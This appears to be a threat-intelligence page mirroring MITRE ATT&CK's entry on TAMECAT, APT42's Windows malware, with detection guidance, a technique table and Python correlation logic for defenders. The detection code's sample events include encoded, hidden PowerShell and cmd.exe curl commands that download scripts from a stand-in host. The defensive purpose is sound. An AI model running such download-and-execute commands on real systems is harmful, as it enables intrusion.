S1193: TAMECAT
Analyst context for executives and security teams
TAMECAT matters because it is a Windows malware entry associated in ATT&CK with APT42 and described as executing PowerShell or C# content. For leaders, the practical concern is not just the malware name; it is the operating pattern it implies: script-based execution, Windows administration interfaces, web-based command-and-control, tool transfer, encoded or encrypted traffic, and checks for security software. These behaviors can undermine endpoint visibility and delay incident response if PowerShell, WMI, command shell, and outbound web telemetry are incomplete.
Executive priority
Prioritize this as a validation case for Windows endpoint resilience and SOC readiness. Executives should ask whether the organization can prove it collects and reviews the evidence needed to investigate script execution, WMI activity, command shell use, suspicious outbound web traffic, file ingress, and security tool discovery. This object is especially useful for control assurance: it tests whether identity, endpoint logging, network monitoring, and incident response workflows can connect execution activity on a host to follow-on command-and-control behavior.
Technical view
ATT&CK provides no dedicated detection text for TAMECAT, so defenders should pivot to the related techniques: T1047 Windows Management Instrumentation, T1059.001 PowerShell, T1059.003 Windows Command Shell, T1059.005 Visual Basic, T1071.001 Web Protocols, T1105 Ingress Tool Transfer, T1132.001 Standard Encoding, T1518.001 Security Software Discovery, and T1573.001 Symmetric Cryptography. SOC teams should validate Windows-focused detections for unusual PowerShell or C# execution chains, WMI process creation, command shell spawning patterns, script interpreter use, newly transferred tools, and outbound web sessions that may contain encoded or encrypted command-and-control content. IR teams should ensure playbooks preserve process lineage, script content where available, network destinations, downloaded files, and evidence of security software enumeration.
Likely telemetry
- Windows endpoint process creation and parent-child process lineage
- PowerShell execution logs, including script block/module logging where enabled
- WMI activity logs and process creation via WMI
- Command shell execution records
- Visual Basic or Windows scripting host execution evidence where collected
Detection direction
- Do not depend on a malware signature alone; ATT&CK’s available context points to behavior-based coverage across Windows execution, discovery, and command-and-control techniques.
- Tune PowerShell analytics for suspicious encoded commands, unusual invocation contexts, remote execution patterns, and PowerShell spawned by unexpected parent processes, while accounting for legitimate administration activity.
- Validate WMI detections for local or remote command execution, especially where WMI launches script interpreters, cmd.exe, or other execution utilities.
- Correlate command shell, PowerShell, Visual Basic, file download, and outbound web activity into a single timeline rather than reviewing each alert class in isolation.
- Review web protocol monitoring for unusual destinations, uncommon user-agent or URI patterns, repeated beacon-like behavior, and transferred files, while recognizing that encryption and standard encoding can reduce content visibility.
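The correlation described in the points above, as an added example that is not code from this page, from ATT&CK, or from the cited reporting: Python detection logic that classifies constructed Sysmon-style process-creation events against the TAMECAT-mapped techniques (WMI spawning a script interpreter, `cmd.exe` running `curl`/`wget`, VBScript execution, encoded or download-capable PowerShell) and then builds a per-host timeline so that a host is flagged only when several technique classes cluster inside one time window. Hostnames, paths, timestamps and the `example.invalid` URLs are constructed; the technique IDs follow the relationships listed on this page.

```python
import base64
import re
from datetime import datetime, timedelta
PLAIN = r"Invoke-WebRequest http://example.invalid/p -OutFile C:\Users\Public\p.ps1"  # constructed sample
ENC = base64.b64encode(PLAIN.encode("utf-16le")).decode()  # -EncodedCommand form: base64 of UTF-16LE text
EVENTS = [  # constructed process-creation events (host, UTC time, parent image, image, command line)
    ("WS01", "2024-05-01T10:00:00", r"C:\Windows\System32\wbem\WmiPrvSE.exe", r"C:\Windows\System32\wscript.exe", r"wscript.exe C:\Users\Public\chk.vbs"),
    ("WS01", "2024-05-01T10:00:05", r"C:\Windows\System32\wscript.exe", r"C:\Windows\System32\cmd.exe", r"cmd.exe /c curl -o C:\Users\Public\s.ps1 http://example.invalid/s"),
    ("WS01", "2024-05-01T10:00:09", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe -nop -w hidden -enc " + ENC),
    ("WS02", "2024-05-01T11:00:00", r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]

def decode_encoded_command(cmdline):
    """Decode a -EncodedCommand/-enc argument (base64 of UTF-16LE text); None if absent or malformed."""
    m = re.search(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le") if m else None
    except (ValueError, UnicodeDecodeError):
        return None

def classify(ev):
    """Map one event to the ATT&CK techniques it evidences (empty set when nothing matches)."""
    parent, image, low, hits = ev[2].lower(), ev[3].lower(), ev[4].lower(), set()
    if parent.endswith("wmiprvse.exe") and image.endswith(("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe")):
        hits.add("T1047")                        # WMI provider host spawning a script interpreter
    if image.endswith("cmd.exe") and re.search(r"\b(curl|wget)(\.exe)?\b", low):
        hits.update({"T1059.003", "T1105"})      # cmd.exe driving a curl/wget download
    if image.endswith(("wscript.exe", "cscript.exe")) and ".vbs" in low:
        hits.add("T1059.005")                    # VBScript execution
    if image.endswith(("powershell.exe", "pwsh.exe")):
        decoded = decode_encoded_command(ev[4])
        if decoded is not None:                  # -enc hides the real command: inspect the decoded text
            hits.add("T1059.001")
            low = decoded.lower()
        if re.search(r"invoke-webrequest|downloadstring|downloadfile|\biwr\b", low):
            hits.update({"T1059.001", "T1105"})  # PowerShell download-and-run
    return hits

def correlate(events, window=timedelta(minutes=10), min_techniques=3):
    """Per-host timeline: flag hosts where hits inside one `window` span >= min_techniques distinct techniques."""
    by_host = {}
    for ev in sorted(events, key=lambda e: e[1]):
        if hits := classify(ev):
            by_host.setdefault(ev[0], []).append((datetime.fromisoformat(ev[1]), hits))
    flagged = {}
    for host, rows in by_host.items():
        best = max((set().union(*(h for t, h in rows if t0 <= t <= t0 + window)) for t0, _ in rows), key=len)
        if len(best) >= min_techniques:
            flagged[host] = sorted(best)
    return flagged
```

The `min_techniques` threshold is where environment baselining belongs: a single `curl` from `cmd.exe` is routine on many admin hosts, while WMI, VBScript, encoded PowerShell and a download converging on one host within minutes is the pattern worth an analyst's time.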
Mitigation priorities
- Establish reliable Windows logging first: process creation, PowerShell, WMI, file creation, and network egress evidence should be available to SOC and IR teams.
- Harden and monitor administrative execution paths such as PowerShell, WMI, command shell, and scripting engines according to business need and least privilege.
- Apply egress monitoring and control for outbound web traffic, with retention sufficient to support incident reconstruction.
- Restrict unnecessary tool transfer paths and monitor creation of new executables, scripts, or payloads on endpoints.
- Review access controls for administrators and service accounts that can use WMI or remote execution mechanisms.
Analyst notes and limits
This take is based on the official ATT&CK S1193 TAMECAT object, its Mandiant external reference, and the supplied relationships. The malware is explicitly described as used by APT42 to execute PowerShell or C# content, and the relationship set links it to execution, discovery, command-and-control, encoding, encryption, and tool transfer techniques. The operational value for defenders is to use TAMECAT as a coverage test for Windows script execution and outbound communications rather than as a standalone indicator-driven detection case.
ATT&CK provides no official detection guidance, aliases, labels, or malware-specific tactics for TAMECAT in the supplied object. The object platform is Windows; some related command-and-control techniques list broader platforms in ATT&CK, but this summary treats TAMECAT validation as Windows-centered. Local conclusions require environment-specific telemetry, baselines, approved administration patterns, and any available indicators from the cited reporting.
TAMECAT
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1059.003 | Windows Command Shell (sub-technique) | TAMECAT has used `cmd.exe` to run the `curl` command.[1] |
| Enterprise | T1105 | Ingress Tool Transfer | TAMECAT has used `wget` and `curl` to download additional content.[1] |
| Enterprise | T1059.005 | Visual Basic (sub-technique) | TAMECAT has used VBScript to query anti-virus products.[1] |
| Enterprise | T1132.001 | Standard Encoding (sub-technique) | TAMECAT has encoded C2 traffic with Base64.[1] |
| Enterprise | T1047 | Windows Management Instrumentation | TAMECAT has used Windows Management Instrumentation (WMI) to query anti-virus products.[1] |
| Enterprise | T1573.001 | Symmetric Cryptography (sub-technique) | TAMECAT has used AES to encrypt C2 traffic.[1] |
| Enterprise | T1518.001 | Security Software Discovery (sub-technique) | TAMECAT has used Windows Management Instrumentation (WMI) to check for anti-virus products.[1] |
| Enterprise | T1059.001 | PowerShell (sub-technique) | TAMECAT has used PowerShell to download and run additional content.[1] |
| Enterprise | T1071.001 | Web Protocols (sub-technique) | TAMECAT has used HTTP for C2 communications.[1] |
Groups, software, and campaigns
G1044: APT42
APT42 is an Iranian-sponsored threat group that conducts cyber espionage and surveillance.[1] The group primarily focuses on targets in the Middle East region, but has targeted a variety of industries and countries since at least 2015.[1] APT42 starts cyber operations through spearphishing emails and/or the PINEFLOWER Android malware, then monitors and collects information from the compromised systems and devices.[1] Finally, APT42 exfiltrates data using native features and open-source tools.[2]
APT42 activities have been linked to Magic Hound by other commercial vendors. While there are behavior and software overlaps between Magic Hound and APT42, they appear to be distinct entities and are tracked as separate entities by their originating vendor.
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | d0cadb754d7a… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Mandiant APT42-untangling: Rozmann, O., et al. (2024, May 1). Uncharmed: Untangling Iran's APT42 Operations. Retrieved October 9, 2024.
[2] mitre-attack S1193
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.